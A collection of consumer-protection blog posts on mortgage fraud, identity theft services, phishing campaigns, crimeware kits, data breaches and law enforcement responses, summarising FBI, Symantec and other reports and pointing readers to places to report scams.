Mortgage scams target the "already unfortunate!"

I guess I'm one of the luckier people out there. When housing prices skyrocketed, I chose to remain happy with my humble digs and watch the frenzy. Now that the bottom has fallen out of the housing boom, at least I'm still semi-whole.

The reason I can only say that I'm semi-whole is that last month I mailed a check to the IRS. In reality, it's probably going to be "proceeds from tax coffers" paying for the mess that was created.

There was fraud in the housing boom. Exactly how much, nobody really knows or is saying. With a lot of desperate people out there -- one thing is for certain -- there are going to be dishonest people approaching them with fraud schemes promising to get them out of their current dilemma.

The FBI just released an interesting report showing fraud trends that contributed to the current financial crisis the housing boom has caused. It's key findings were that mortgage fraud is on the rise, subprime loans contributed to mortgage fraud, the downward trend in housing will continue and that the current financial crisis is creating a new wave of fraud targeting the people, who have already lost their shirts, as as result of this crisis.

From the press release on this subject:

The latest mortgage scams run the gamut: from “builder-bailout” schemes where developers unload excess inventory through financial trickery…to foreclosure rescue frauds that trick homeowners into signing over the deed to their house; from seller-assistance scams that use false appraisals to sell homes…to identity theft that leads to home equity credit lines being opened and drained. See the report for more details.

The report lists the two main categories of mortgage fraud:

Mortgage loan fraud is divided into two categories: fraud for property and fraud for profit.

Fraud for property/housing entails misrepresentations by the applicant for the purpose of purchasing a property for a primary residence. This scheme usually involves a single loan. Although applicants may embellish income and conceal debt, their intent is to repay the loan.

Fraud for profit, however, often involves multiple loans and elaborate schemes perpetrated to gain illicit proceeds from property sales. It is this second category that is of most concern to law enforcement and the mortgage industry. Gross misrepresentations concerning appraisals and loan documents are common in fraud for profit schemes and participants are frequently paid for their participation.

The full report, which goes into a lot of detail on current trends can be seen, here.

Besides the latest report, the FBI has a page on their website dedicated to educating the average person how they might be taken to the cleaners as a result of mortgage fraud.

The page has information on a lot of the recently discovered schemes. Included is a well-written story about a pretty scary phenomenon called, "house stealing."

House stealing is where mortgage fraud meets identity theft.

… The con artists start by picking out a house to steal—say, YOURS. … Next, they assume your identity—getting a hold of your name and personal information (easy enough to do off the Internet) and using that to create fake IDs, social security cards, etc. … Then, they go to an office supply store and purchase forms that transfer property. … After forging your signature and using the fake IDs, they file these deeds with the proper authorities, and lo and behold, your house is now THEIRS.*

Although not considered common, there was a recent case in Southern California involving a variation of this scheme and it involved over 100 homeowners. More recently, the Boston Globe reported that 11 individuals were indicted in a $10.6 million loan fraud scam. Straw buyers and identity theft are part of the formula in this case, also.

And it doesn't only happen in the United States, I've read of this occurring in Canada, also.

The FBI has allocated 200 agents and 33 task forces to investigate mortgage fraud, according to an article in Reuters that quoted FBI Director Robert Mueller. The article mentioned that 19 major corporations are under investigation and Mueller referred to the FBI's involvement in investigating the Saving and Loan crisis, Enron and World.com, while delivering his speech.

If you happen to get approached with an offer that seems a little too good to be true (or are suspicious of a past scheme) you can report the matter to the FBI. The people behind these schemes have caused a lot of pain and suffering for a lot of people and besides that, if you pay taxes, you are probably paying for this problem.

Another law suit filed against Lifelock identity theft protection services in West Virginia

Despite all the publicity that Lifelock continues to do well, a third class action has been filed against them for misleading advertising in West Virginia.

From the PR Newswire release:

Marks & Klein, LLP today filed its third class action lawsuit against LifeLock, Inc., a provider of identity theft protection services, and its CEO Richard "Todd" Davis. The lawsuit was filed in the Circuit Court of Jackson County, West Virginia (Docket No. 08-C-69), on behalf of Kevin Gerhold of Falling Rivers, as well as all other LifeLock subscribers in West Virginia.

This follows similar class actions filed in New Jersey and Maryland.

"The lawsuits allege that LifeLock and its multi-million-dollar advertising campaign provided false and misleading information about the limited level of identity protection the company provides, and failed to warn them about the potential adverse impact the company's services could have on their credit profiles," according to the press release.

Additionally, the release alleges that Lifelock CEO, Todd Davis has been a victim of identity theft multiple times since using his SSN as a marketing tool to sell the service.

So far only one instance of this has been reported. Here is what I wrote about it in a previous post about pending litigation between Experian and Lifelock:

Shortly thereafter, CEO Todd Davis made headlines when he organized a "posee," complete with film crew to go after the person, who stole his identity to get a loan. The identity thief in question was described as mentally disabled by the authorities and the charges were dropped because of the questionable tactics used, referred to as coercion.

So far as Lifelock not protecting people from all forms of identity theft, as alleged in all three of these actions, I offered my speculation (opinion) on what that was referring to:

Another reason there is no way to guarantee protection is that not all identity theft shows up on credit bureaus. Some examples of this are in cases of medical benefit fraud, employment fraud, government benefit fraud, some forms of check fraud and last, but not least, when it is used to commit crimes of other than a financial nature.

The press release indicates that other law suits are being considered in other States.

An item of interest not disclosed in all the other actions was that a woman had her stolen debit card used to purchase identity theft services from Lifelock:

Beyond the charges leveled in the Complaints, lead counsel Paris related the story of a Wisconsin consumer who contacted the firm regarding her accidental experience with LifeLock. "Her debit card was stolen and the thief had the audacity to use the card to buy a subscription to LifeLock," he noted. "Most disturbingly, LifeLock issued the subscription to the thief in the thief's name, clearly failing to verify the appropriate information."

I guess the person, who did this believes in protecting their own identity, at least, as long as, they aren't paying for it, themselves?

The services offered by Lifelock aren't much different than a lot of other services being offered by other companies. This has often led me to wonder if the actions against Lifelock are only the beginning?

The identity theft industry, which is growing at a double-digit rate, has attracted a of start up companies and it can be difficult for the consumer to determine exactly what they are paying for.

Most of the experts (not selling services) agree most people can fix their identity for free, and in the long run, they might do a better job of it, themselves.

If someone were to do this, a good place would be the FTC's Identity Theft page. Other decent free resources are the Identity Theft Resource Center and the Privacy Rights Clearinghouse.

State's top lawman takes a "Don't mess with Texas" approach to fighting identity theft

(Texas Attorney General Greg Abbot)

Texas Attorney General, Greg Abbott, is teaching the business world not to mess with the personal information of Texans.

Using a series of laws that he wrote an essay on, AG Abbot has taken legal action against Radio Shack, CVS Pharmacy and CNG Financial Corporation doing business as as Check and Go and Southwestern & Pacific Specialty Finance for not properly protecting people’s information. His office also has pending action against “Select Physical Therapy Texas Limited Partnership and its parent company, Select Medical Corporation, as well as Minnesota-based LifeTime Fitness for improperly discarding customer records,” according to a press release on his site.

Notably, it didn't take a crack team of computer security geeks to crack these cases. In all of these instances, the investigators used a more old fashioned, but often effective investigative technique called dumpster diving.

Going back to my original premise that there is a lot of unprotected information being compromised too easily, these cases represent how much low hanging fruit is available to identity thieves.

This probably wouldn’t surprise anyone who has taken a look at Attrition.org’s Data Loss Database - Open Source. Fairly frequently, mass amounts of information go missing for not very "technical" reasons.

On Tuesday, the Texas AG site announced a new tool to assist Texans in recovering from becoming an identity theft victim:

The Attorney General’s Identity Theft Victim’s Kit offers a step-by-step priority checklist that victims can use as soon as possible to prevent further damage. Once the identity theft has been confirmed, for example, victims should quickly close all bank, credit, utility and service accounts. Next, victims should contact one of the major credit bureaus and request that fraud alerts or security freezes be placed on their credit reports. This action prevents new accounts from being opened fraudulently under victims’ names.

Also mentioned in the press release is that it still pays to report identity theft to the Federal Trade Commission. They point out that, "many creditors will accept this affidavit on victims’ behalf in lieu of a police report about the crime."

They also point out something that I think is even more important:

A recent trend among identity thieves suggests the criminal may use victims’ personal information to obtain a driver’s license, file for bankruptcy, seek Social Security benefits or apply for a passport. In such cases, the Identity Theft Victim’s Kit instructs victims to immediately contact any government agencies approached by identity thieves.

A lot of people have been led to believe that the final solution to preventing identity theft is to monitor your credit bureau. Unfortunately, a lot of this has been driven via advertising campaigns by some of the pay for protection identity theft services.

Identity theft isn't only a problem in financial crimes. Criminals steal identities to work, obtain government benefits and to commit a wide range of "other than financial crimes."

Critics of the pay for protection industry have often pointed out these paid services, although convenient, accomplish what a person could do free-of-charge, themselves. Since it is an unregulated industry, the services offered varying levels of protection, also.

There are some of these services that are way better than others, and if you decide to go shopping for one, the term "caveat emptor" (buyer beware) is a wise principle to apply.

This site, http://www.texasfightsidtheft.gov/index.shtml, offers one click access to all the steps a person needs to take to recover from becoming an identity theft victim. It also offers a lot of resources that a prudent person can use to prevent identity theft.

After reviewing this site, I noted that it could be used by citizens of just about anyone residing in the United States of America.

In closing, the approach taken by Attorney General Abbott and his office is refreshing and a lot of other elected officials would benefit from studying what I consider a "no nonsense" approach to combating identity theft.

Symantec May Spam Report reveals IRS e-mail leads to vampire game?

Symantec just released it's monthly spam report. I always find these reports a valuable tool to see exactly what trends the cybercriminal and less than ethical e-commerce communities have been up to in the past month.

Although most of us view spam as a major nuisance, the fact remains that spam is the preferred vehicle of marketing garbage and ripping off human beings on the Internet.

This month continues a nasty trend where spammers and phishermen (identity and information thieves) continue to manipulate Google's search engine:

For some time, spammers have used reputable brands to try and deliver spam and phishing messages to end-users. In the last year, Google has become a favorite target for some spammers. In November 2007, Symantec reported the emergence of a technique where spammers manipulated Google’s advanced search query and the “I’m feeling lucky” option to direct users to a spam site. In February 2008, Symantec reported that spammers had manipulated parameters in Google URLs used for AdSense and redirected unsuspecting end-users to a spam website. In April 2008 phishing emails purporting to come from the Google AdWords service have emerged. Google AdWords is a service that allows advertisers to intelligibly connect with individuals who search using Google. In the Google AdWords phishing samples that have emerged, the end-user is encouraged to click on a link to update their billing information and/or renew their account. The link in these phishing emails leads to a fraudulent website where personal information is requested and harvested.

Spear phishing, where specific people are targeted arrived in inboxes in the form of fake government subpoenas addressed to corporate executives. Also seen were come-ons to become a movie star, spam being sent in the form of instant messages and the 419 (Advance Fee) boys inserting calendar reminders in their spam to remind people send them their money.

While closely related to the long known use of job sites to gather information to commit identity theft, a new twist has been noted where professional networking sites are used for this purpose, also.

From the May report:

One of the side effects stemming from the growth of personal and professional networking sites is the increase in unsolicited emails that operate under the guise of connecting business professionals with their peers. The recipient is asked to join the “inner circle” and is encouraged to supply the network with their professional history by clicking on a URL which brings the user to a registration page. The page requests personal information that could be used for identity theft and could fuel future spam attacks.

In these monthly reports, Symantec normally has one twist with a particularly ghoulish or amusing angle. This month is no exception and they are reporting an IRS spam campaign that leads to a site where you can raise a vampire from the dead:

This time, instead of the refund link taking you to a site to steal your credentials, the link takes you to a popular web-based game in which you incarnate a vampire. The vampire gains more power every time end-users click on his link. It’s a rough, dark world out there… be warned.

I found this especially ironic because scammers and spammers are often referred to as ghouls or vampires when being described in literary terms. So far as the connection to all of this with the IRS, I'll leave that to the reader's imagination.

The IRS having their name spammed is nothing new. As predicted, there is an IRS spam (phishing) campaign going on right now using the tax stimulus program as a come-on to steal personal and financial information, which will probably be used to commit financial crimes. I'm predicting this might be a topic of interest on the June Spam Report.

The full report on the State of Spam for the month of May may be seen courtesy of Symantec, here.

FBI reports tax stimulus phishing campaign underway

The FBI Cyber Investigations Division issued a press release that spammers are phishing for people's personal details using the tax stimulus program as bait.

The Federal Bureau of Investigation warns consumers of recently reported spam e-mail purportedly from the Internal Revenue Service (IRS) which is actually an attempt to steal consumer information. The e-mail advises the recipient that direct deposit is the fastest and easiest way to receive their economic stimulus tax rebate. The message contains a hyperlink to a fraudulent form which requests the recipient's personally identifiable information, including bank account information. To convince consumers to reply, the e-mail warns that a failure to complete the form in a timely manner will delay the issuance of the rebate check.

My guess is that the intent in getting your bank account information is to take it over and drain it of all it's assets.

Please note that phishing normally requires a person to willingly give up their information, but more and more, a new phenomenon is being seen called a drive by infection is being seen in the "wild" a.k.a. the Internet.

I wrote about this recently in a post called, "Nowadays, all you need to do is visit the wrong site to have your personal information stolen! "

As noted in the post, the phishermen have been seen using social engineering ploys, along with malicious software in conjunction with each other.

If you want to learn more via FBI recommended educational tools, or report a phishy e-mail, here is a way you may do so:

Please notify the IC3 by filing a complaint at www.ic3.gov. More information on scams is also available on www.fbi.gov and www.lookstoogoodtobetrue.com.

You can also report IRS related phishing scams to phishing@IRS.gov, here.

FBI press release with example of one of the phishmails, here.

In case you want to see when you are going to get your "actual" stimulus check (if you qualify), the IRS has a tool to figure it all out on their site.

Stolen information from 40 financial and medical institutions discovered on rogue server

Once in awhile, I speculate that stolen information is a lot more valuable to the criminal element before it becomes apparent that it's been stolen. I've also speculated aloud that there is probably a lot more stolen information out there than we are aware of. The good folks at Finjan are well on their way to substantiating this speculation.

Yesterday, they announced the following on their malicious page of the month:

While we were examining malicious code, we came across a domain which was being used as a command and control for the Crimeware that was executed on attacked machines. The domain was also used as the “drop site” for private information being harvested by that Crimeware.

When we further examined this server, we found the stolen data left unprotected and available for anyone on the web (i.e. no access restrictions, no encryption whatsoever).

The server that we analyzed contained more than 1.4Gb of data (both business and personal related) collected from infected PCs, which consisted of 5,388 unique log files, that were traced back to 5,878 distinct IP addresses. Both email communications and web related data were found.

The information discovered was from 40 unnamed financial and medical institutions from several different continents. The server used to store this information was being moved frequently, but if found, anyone could access it.

They made the observation that last year, according to what statistics are available, 8.5 million records were compromised. One of these statistics, obtained from IC3 states that 20 percent of the 206,884 cases (roughly 40,000) were due to computer hacking. Finjan points out that on this one server, they discovered approximately 5,000 records.

I’ll let the reader do their own math, but if this is true there is probably a lot of unknown hacking activity happening in the wild.

Please note that all the kind people compiling statistics only know what is reported to them, and some of them have been very vocal in pointing this out. My personal guess is that there is so much stolen information out there that when any individual case is investigated, it’s almost impossible to do more than speculate, exactly where the point of compromise occurred.

Besides that, hackers are unlikely to want to reveal where they are stealing all their information from. Once revealed, it’s harder to use and not worth as much money.

The information on the server included compromised medical information, online banking information (including passwords) and complete logs of payment card (debit/credit) card transactions, including CVV2 information and the miscellaneous “extras.” This all occurred on “supposedly” secure sites.

I found this interesting because the merchants have been under fire for becoming compliant with PCI data security standards in light of a few highly publicized data breaches. Of course in the recent Hannaford case, they were compromised and had been certified as being PCI compliant. PCI data security procedures are the payment card industries own standards for protecting information.


Based on these findings, hackers don’t have to compromise a merchant to steal everything they need to commit financial crimes and it’s pretty obvious that financial institutions are being compromised, also.

Also found on the server was a lot of business proprietary information harvested from a lot of internal e-mail accounts. In the past year or so there seems to have been a lot of campaigns to obtain other than financial information from businesses. The clear intent in this activity is corporate espionage (my speculation).

Finjan reports that this particular theft campaign was made possible with a do-it-yourself (DIY) crimeware kit called the AdPack Toolkit. They also reported that this kit gives the user command and control functions, enabling them to execute admin functions with the illicit software.

Finjan is not revealing (they never do) exactly which institutions were compromised. Even though they are not revealing names, they did report the activity to law enforcement and the institutions involved.

Truston ID Theft protection and recovery platform rakes in another award!

It appears that Tom Fragala and the MyTruston team have raked in (yet) another award. This time from the Pacific Coast Business Times as one of the hot start-up companies coming from California's Central Coast.

Tom Fragala, Truston's CEO wrote on his blog, "This recognition comes on the heels of being named a 2008 Hot Company and receiving a technology award from the Info Security Products Guide."

Here is the reason why they were chosen:

Truston's MyTruston® service is the only fully online identity theft recovery system. It is web-based software that can help millions of people easily recover from and prevent identity fraud by supporting virtually any type of ID theft. MyTruston walks consumers step-by-step through the entire prevention or recovery process—dramatically reducing the time, financial cost, and emotional impact. And it can easily be embedded into a partner's own website on a private-label basis.

The press release also contains a comment from Tom Fragala, CEO of Truston:

“The Pacific Coast Business Times recognition of Truston as one of the hottest startups in Central California further validates our innovative products and strategy of offering our services to large partners in the identity theft, direct marketing and financial services markets,” said Tom Fragala, CEO and founder at Truston. “Superior technology and support for partners differentiates Truston from other companies in the identity theft protection market.”

Tom developed Truston based on his own personal experience as an identity theft victim and has spent thousands of hours assisting other victims of identity theft.

Because of this, coupled with the fact that he is selling this technology to large partners, he still takes care of us "little people" by offering a free 45 day trial (no credit card needed) of the Truston platform.

Saying that, I should mention that the platform has always protected people free of cost and only charges for using it to recover after a person is a confirmed identity theft victim. Most companies charge you right from the beginning and will only help you if you were paying at the time of the crime (pardon the pun). Many of them also require that you surrender all your personal details, which they maintain on a database. Information on databases are a favorite place for identity theft thieves to obtain the resources they need to commit their crimes.

There are some, who believe one of the root causes of identity theft is the multi-billion dollar business of buying and selling information, which is normally maintained in databases.

If you are interested in checking out the Truston platform while it is still free, I've provided a link, here.

Does the proposed class action settlement in the Certegy data breach case lack teeth?

I happened to notice, I was getting a lot of hits on some posts about the Certegy data breach and discovered that there is a proposed settlement in the class action law suit against them.

Tim Wilson at Dark Reading pointed out that this settlement amounts to Certegy paying less than $1 per victim and wrote:

Certegy Check Services is proposing to settle a class action lawsuit of last year's security breach on behalf of 8.4 million victims for about $4 million.

According to a report in the St. Petersburg (Fla.) Times, Certegy will also offer free credit monitoring services to some victims and reimbursement of credit monitoring expenses totaling $1 million on a first-come-first-served basis.

He also surmised in his article that:

While plaintiffs' lawyers hailed the offer as a victory, critics said the relatively small settlement will not help the cause of identity protection. The massive TJX breach also resulted in a relatively small settlement for the victims, netting about $6.5 million for customers.

Of note, I would imagine the plantiff's lawyers made A LOT more than $1 each for orchestrating this event. In all fairness, given the precedent set by similar actions might mean there isn't a very "deep pocket" on this type of action.

At $1 million for monitoring divided by 8.4 million potential victims, if any of them want the free monitoring, they better move quickly.

So far as the $4 million being set aside to make victims whole, I wonder how hard it is going to be for them to prove (as required by this settlement) that Certegy was the point-of-compromise in their case? The general rule of thumb is that identity thieves, even if they are caught (rare), probably aren't 100 percent sure where the information came from themselves. There is so much stolen information out there, it's being traded over the Internet.

The sad truth is that with all the data breaches out there, it might be hard to prove exactly where an identity theft victim's information was compromised.

So far as the criminal prosecution of the employee, one William Sullivan, who sold off 8.5 million people's records, I did a post in November about how he was able to make a plea bargain and get a reduced sentence in this case. There was a mention of a data broker being a co-conspirator, but they never seemed to be named (at least in public).

Personally, I've always had mixed feelings about law suits that result when data breaches occur. There is an argument that at least some (my opinion) of the organizations being breached are victims in the overall equation, also.

Saying that, if this class action and the one for TJX have set the legal precedent on this type of action, they are unlikely to serve as much of a deterrent against data breaches, or all the identity theft that results from them. Furthermore, the criminal prosecution of William Sullivan in his case is unlikely to be much of a deterrent, either.

In fact these results are probably going to do little to inspire organizations to protect their information better and for some, will probably be viewed as a cost of doing business.

I guess it's time to go back to the drawing board to figure out a way to effectively address information/identity theft and data breaches?

Here are the original posts, I did on this matter, which contain some angry commentary from more than one victim:

Not to worry, check processing company (Certegy) believes the 2.3 million stolen records will not be used for fraud!

Certegy reveals their data breach is a lot larger than originally reported

Class action law suit filed against Certegy for data breach

Federal Reserve backs proposing reforms on credit card rules

Credit card fees, which a lot of consumer groups, have called out as unfair and abusive are in the news again. Today, the Federal Reserve Board proposed changes, which some believe have been a long time coming.

From the Federal Reserve's press release:

The Federal Reserve Board on Friday proposed rules to prohibit unfair practices regarding credit cards and overdraft services that would, among other provisions, protect consumers from unexpected increases in the rate charged on pre-existing credit card balances.

Without going to to the regulations governing this, here is what is being proposed:

Banks would be prohibited from increasing the rate on a pre-existing credit card balance (except under limited circumstances) and must allow the consumer to pay off that balance over a reasonable period of time.

Banks would be prohibited from applying payments in excess of the minimum in a manner that maximizes interest charges.

Banks would be required to give consumers the full benefit of discounted promotional rates on credit cards by applying payments in excess of the minimum to any higher-rate balances first, and by providing a grace period for purchases where the consumer is otherwise eligible.

Banks would be prohibited from imposing interest charges using the "two-cycle" method, which computes interest on balances on days in billing cycles preceding the most recent billing cycle.

Banks would be required to provide consumers a reasonable amount of time to make payments.

Sub prime credit card products are also being addressed by limiting fees that can be automatically applied to a balance. Greater transparency on interest rates and credit limits is being proposed, also.

ConsumersUnion.org issued a press release the day before the Federal Reserve did offering a mixed reaction to the proposal:

"It’s about time federal regulators offered consumers some relief from unfair bank practices," said Consumers Union Financial Services Campaign manager Gail Hillebrand. "This proposed rule finally acknowledges that some practices just aren’t fair. All the disclosure in the world can’t make it fair to send the bill too close to the due date; to raise the interest rate on money already borrowed: or to charge a fee for a problem caused by the bank’s practice to allow a credit hold or a debit hold.”

The proposed rules respond to a sustained outcry from consumers and strong interest in Congress in credit card reform and in reform of bank account practices such as overdraft loans.

Consumers Union praised the approach of the proposed rule to ban, not just require more disclosure about, some of the worst credit card practices.

They also issued a press release on April 30th commending Senator Dodd, who is the Senate Banking Committee Chairman, for introducing the Credit Card Accountability, Responsibility and Disclosure Act.

ConsumersUnion.org has long been critical of the credit card industry and has an ongoing campaign to bring about reforms to the industry.

Federal Reserve press release, here.

Internet Gangstas don't appreciate software piracy, either!

Crimeware salesmen, like most e-commerce types, take a dim view when their creations are knocked-off (pirated). To protect themselves, they warn their customers (Internet criminal types) that if their products are counterfeited, they can and will be reported to the anti-virus companies.

Specifically, the verbiage used as reported on the Symantec blog is, "the binary code of your bot will be immediately sent to antivirus companies."

The reason reporting reporting the binary code of a bot defeats the crimeware kit in question (Zeus) was mentioned in a previous post on this blog:

Known as the "Zeus kit," in honor of the Zeus Trojan, the kit is pretty resistant to computer security programs and has the ability to mask itself using a binary generator. The binary generator sends out a unique set of numbers every time it is used, making it hard for security programs to detect since they rely on spotting what is known as a "signature." Even if a security program recognizes one signature, the binary generator changes it the next time, and the security program will probably fail to recognize it.

Here are the details, as reported on the Symantec blog by Liam OMurchu:

Here is a perfect example. The screen shot below is taken from a typical underground software package. Shown in the screen shot are the terms and conditions of the sale—the “licensing agreement.” Yes, that’s right; some underground packages come with a licensing agreement. The document is written in Russian, but a translation is provided below.



2. The Client:
1. Does not have the right to distribute the product in any business or commercial purposes not connected with this sale.
2. May not disassemble / study the binary code of the bot builder.
3. Has no right to use the control panel as a means to control other bot nets or use it for any other purpose.
4. Does not have the right to deliberately send any portion of the product to anti-virus companies and other such institutions.
5. Commits to give the seller a fee for any update to the product that is not connected with errors in the work, as well as for adding additional functionality.

In cases of violations of the agreement and being detected, the client loses any technical support. Moreover, the binary code of your bot will be immediately sent to antivirus companies.

It should be noted that these crimeware kits, as I've written frequently, make it fairly easy for not very technical criminals to commit technical crimes. As noted in their licensing agreement, the criminals selling these kits in underground forums even provide technical support.

Interestingly enough, Liam noted:

Despite the clear licensing agreement and the associated warnings, this package still ended up being traded freely in underground forums shortly after it was released. It just goes to show you just can’t trust anyone in the underground these days.

Of course, in most instances, there is no honor among thieves.

Liam notes that this licensing agreement is for much talked about Zeus kit, which has "drive-by" capabilities. If you are unfamiliar with what "drive by" means on the Internet, it means that your computer only needs to visit a site to become infected.

Here is a previous post, I recently did about the "drive by" problem, which is making the Internet a more dangerous place all the time:

Nowadays, all you need to do is visit the wrong site to have your personal information stolen!

Liam's post on the Symantec blog, here.

DOJ announces strategy to go after organized crime in a borderless environment

I've often written about borderless crime being committed with a click of a mouse, as well as, the lines that law enforcement jurisdictions impose, which can make investigative and prosecution efforts, frustrating.

The Attorney General and the Justice Department are announcing a new strategy to go after the problem.

From the press release on fbi.gov:

Today, Attorney General Michael B. Mukasey announced a new strategy in the fight against international organized crime that will address this growing threat to U.S. security and stability. The Law Enforcement Strategy to Combat International Organized Crime (the strategy) was developed following an October 2007 International Organized Crime Threat Assessment (IOC Threat Assessment) and will address the demand for a strategic, targeted, and concerted U.S. response to combat the identified threats. This strategy builds on the broad foundation the Administration has developed in recent years to enhance information sharing, and to secure U.S. borders and financial systems from a variety of transnational threats.

In the press release, Attorney General Mukasey sums up the threat by saying:

The strategy specifically reacts to the globalization of legal and illegal business; advances in technology, particularly the Internet; and the evolution of symbiotic relationships between criminals, public officials, and business leaders that have combined to create a new, less restrictive environment within which international organized criminals can operate. Without the necessity of a physical presence, U.S. law enforcement must combat international organized criminals that target the relative wealth of the people and institutions in the United States while remaining outside the country.

Also stated in the verbiage of the press release is that there will be more coordination of information between federal law enforcement agencies. "This unprecedented coordination will include utilizing all available U.S. government programs and capabilities, including existing economic, consular, and other non-law enforcement means," according to Attorney General Mukasey.

"The Law Enforcement Strategy to Combat International Organized Crime (the strategy) was developed following an October 2007 International Organized Crime Threat Assessment (IOC Threat Assessment)," according to the press release.

The press release identifies and defines the following strategic threats:

International organized criminals have penetrated the energy market and other strategic sectors of the U.S. and world economy. As U.S. energy needs continue to grow, so too could the power of those who control energy resources.

International organized criminals provide logistical and other support to terrorists, foreign intelligence services, and foreign governments, all with interests acutely adverse to those of U.S. national security.

International organized criminals traffic in people and contraband goods, bringing people and products through U.S. borders to the detriment of border security, the U.S. economy, and the health and lives of those human beings exploited by human trafficking.

International organized criminals exploit the U.S. and international financial system to move illegal profits and funds, including sending billions of dollars in illicit funds through the U.S. financial system annually. To continue this practice, they seek to corrupt financial service providers globally.

International organized criminals use cyberspace to target U.S. victims and infrastructure, jeopardizing the security of personal information, the stability of business and government infrastructures, and the security and solvency of financial investment markets.

International organized criminals are manipulating securities exchanges and engaging in sophisticated fraud schemes that rob U.S. investors, consumers, and government agencies of billions of dollars.

International organized criminals have successfully corrupted public officials around the world, including in countries of vital strategic importance to the United States, and continue to seek ways to influence—legally or illegally—U.S. officials.

International organized criminals use violence and the threat of violence as a basis of power.

What alarmed me the most in this news release, especially with out of control oil prices, was that organized crime was involved in the energy sector. Randall Mikkelsen at Reuters must have been interested in this statement and questioned Alice Fisher, head of the DOJ criminal division. Fisher seemed downplay the statement by saying "I don't think that you can directly link the two." Fisher did go on to state that organized crime had a foothold in global financial markets?

To me, that's at least as scary as organized criminals being involved in the energy sector. What we do know is that both the financial and energy sectors seem to be causing the average citizen a considerable amount of pain and suffering, lately.

The reason for this response might be that investigative entities don't generally want to comment on the specifics of any ongoing investigations? There are good reasons for not doing so.

Interestingly enough, the Organised Crime and Corruption Reporting Project, which is run by some Eastern European journalists has covered potential organized criminal involvement in the energy sector in Eastern Europe. On a story, which can be seen on the home page of the site, it states:

In between are the energy traders. They say they are the future of low-cost energy but that is a promise yet to be fulfilled. These politically connected and well-financed businessmen have reaped billions in sales, often at the expense of state companies. Investigators in a number of countries are trying to determine whether some of them made their millions in profits illegally or legally in systems that have few laws and not enough regulations.

Although the executives at Enron were never found to be involved with organized crime, the Enron debacle illustrates how a little dishonesty in the energy sector can create a lot of financial havoc for a lot of people!

Also alarming, is the statement that public officials around the world are being corrupted by these groups.

As I stated in the first paragraph, I've often written about some of the items now being identified as strategic threats. We live in a society, where identities are stolen in mass, counterfeiting is rampant and rumors of foreign governments hacking into military and industrial systems are surfaced, too frequently.

And so far as hacking, criminal organizations -- who seem to be run as efficiently as any successful corporation -- appear to have the ability to crack into whatever defenses the good guys put into place. There has been speculation that these groups can afford to recruit the best and the brightest in a lot of "disciplines" in addition to information technology, also.

These factors have also enabled a lot of other (even more dangerous) criminal activity to spread at what some consider, epidemic proportions.

Given all these trends, the only successful strategy is to go after the people behind it. Nothing else has seemed to work very well, at least so far!

The full press release can be seen, here.

Reuters story can be seen, here.

I would also like to thank Suad and Lazarus at Paper Weapons, Heike at The Dark Visitor (information on Chinese hacking) site and the journalists at the Organised Crime and Corruption Reporting Project for the links, which I seeded in this post to make a point.

80 year old man loses over $700,000 to advance fee (419) scammers

With spam e-mails offering too good to be true come-ons filling up our mailboxes, we often forget that there are some very real people who get victimized after falling for one of them.

Of course with the availability of botnets -- which command legions of spam spewing zombies (compromised computers)-- even if only a few people fall for the scheme, the scammers still make a tidy sum off of other people's misfortunes.

An example of this can be found on the Newport Beach Police website, where an elderly gentlemen lost a lot of money (probably his life savings) to one of these schemes:

Recently, an 80 year old resident of the city learned he was a victim of an international lottery scam. He originally received an email claiming he had won an overseas lottery which required him to pay a processing fee to have the funds released. This scam continued for a two year period and ended with the victim losing over $700,000.00.

Scam operators (often based in Canada) are using email, telephone and direct mail to entice U.S. consumers to buy chances in high-stakes foreign lotteries from as far away as Australia and Europe. These lottery solicitations violate U.S. law, which prohibits the cross-border sale or purchase of lottery tickets by phone or mail.

This type of scam is often referred to as an Advance Fee (419) scam.

Of course, the lottery scam isn't the only one out there. There are work-at-home (job) scams, secret shopper, romance, lottery and auction scams being sent out in millions (billions ?) of e-mails, also. And if you don't have your own financial resources, the scammers will gladly provide you with a wide array of counterfeit financial instruments to negotiate. They could care less if you get arrested and expect that you will wire them any proceeds if you successfully pass the bogus instrument.

Please note, that just because you initially are able to pass the instrument doesn't mean that someone won't come after you, later.

The news release from Newport Beach Police Department offers the following advice on how to report scams like this:

The FTC works for the consumer to prevent fraudulent, deceptive, and unfair business practices in the marketplace and to provide information to help consumers spot, stop, and avoid them. To file a complaint or to get free information on consumer issues, visit ftc.gov or call toll-free, 1-877-FTC-HELP (1-877-382-4357); TTY: 1-866-653-4261. The FTC enters Internet, telemarketing, identity theft, and other fraud-related complaints into Consumer Sentinel, a secure online database available to hundreds of civil and criminal law enforcement agencies in the U.S. and abroad.

They also point to a page on the FTC website about cross border scams, which can be seen here.

If you are a more "visual type," I recommend going to fakechecks.org, which has a series of video presentations on this subject.

WTC construction plans/hundreds of worker's personal information trashed at Ground Zero

When it comes to information being compromised, a lot of it can be traced to simple human error a.k.a. "stupidity."

A glaring testament to this fact is being reported by the New York Post:

Hundreds of Ground Zero workers were exposed to potential identity theft when stacks of payroll sheets - which included their names and Social Security numbers - were dumped in the trash along with confidential plans for the new World Trade Center.

Plans for the new Port Authority Police Station were also found.

Fortunately, a homeless person discovered the plans for the new Freedom Tower (presumably while dumpster diving).

This prompted two unnamed individuals, described as "salvage experts" to turn in the other sensitive documents found in the trash:

Included in the stash were blueprints for World Trade Center 4 and the temporary PATH station, construction specifications for World Trade Center 7 and plans for the PA Police headquarters.

In this instance, we are probably lucky that salvage experts and a homeless person found this sensitive information instead of a criminal, or even worse, an Osama Bin Laden "wannabe."

If you would like to see other examples of human error, or stupidity being the cause of information being compromised, the DLDOS database at Attrition.org and PogoWasRight have a lot of examples that they share with the public-at-large.

PogoWasRight's mantra, "WE HAVE MET THE ENEMY AND HE IS US" certainly applies in this instance!

New York Post story by Lukas I. Alpert and Matthew Nestel, here.

Nowadays, all you need to do is visit the wrong site to have your personal information stolen!

On his birthday, Uriel Maimon of RSA reflected about a lot of personal things (as most of us do), as well as, how spam and phishing are becoming more sophisticated and dangerous.

One major player in the spam and phishing game are known as the "Rock Phish." In his birthday post, Uriel gives us a little historical perspective on the group:

The Rock Phish group is a phishing gang believed to be based out of Russia -- and, by some accounts, is responsible for roughly 50% of phishing attacks by volume. The Rock gang has also pioneered several new approaches in phishing: in 2004 it was the first (and, for a long time, they were the only) gang to employ bot-nets in its phishing infrastructure in order to make the attacks live longer and be more scalable. It also pioneered new techniques in its spam mails so the mail could more easily evade spam filters.

